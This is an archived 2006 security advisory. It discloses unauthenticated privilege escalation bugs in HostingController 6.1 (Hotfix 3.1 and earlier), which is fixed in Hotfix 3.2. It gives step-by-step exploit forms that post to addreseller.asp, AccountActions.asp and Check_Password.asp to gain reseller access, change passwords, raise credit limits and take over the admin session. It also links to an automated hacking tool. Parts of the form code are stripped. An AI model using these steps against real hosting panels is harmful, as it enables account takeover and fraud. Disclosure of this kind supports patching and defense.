AOH :: HP Unsorted H :: B06-3480.HTM

Hostingcontroller: an attacker can gain reseller privileges and after that can gain admin privileges



HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
HostingController: An attacker can gain reseller privileges and after that can gain admin privileges



Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I publish the most important bugs of hosting controller program, after 3 weeks from reporting to the main company (for more security)

Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------




Form1
URL:
reseller
loginname
Password
first_name
first_name
last_name
address
city
state
country
email
phone
fax
zip
selMonth
selYear
txtcardno

--------------------------------------------------- =============================================== 2- This code list all of resellers then you must change a password of one of them then login by it for next step. Note: Also by this code, everyone can increase its Credit value then buy every host. ---------------------------------------------------
action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
Username:
Description:
FullName:
AccountDisabled 1,[blank]:
UserChangePassword:
PassCheck=TRUE,0:
New Password:
DefaultDiscount%:
CreditLimit:



--------------------------------------------------- =============================================== 3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it! now select it and click Enter to enter by that user. now the bug will be available: each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp" below code will help you: ---------------------------------------------------

Form1
action="http://[URL]/Admin/Check_Password.asp" method="post">
AdName



--------------------------------------------------- =============================================== ------------------------------------------------------------------------------------- Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili") Email: Irsdl[47]Yahoo[d07]com Team: GSG (Grayhatz Security Group) [Grayhatz.net] Thanks from: Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com) Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com) Kahkeshan Co. (IT Department) (www.kahkeshan.com) Related URLs: http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl) http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.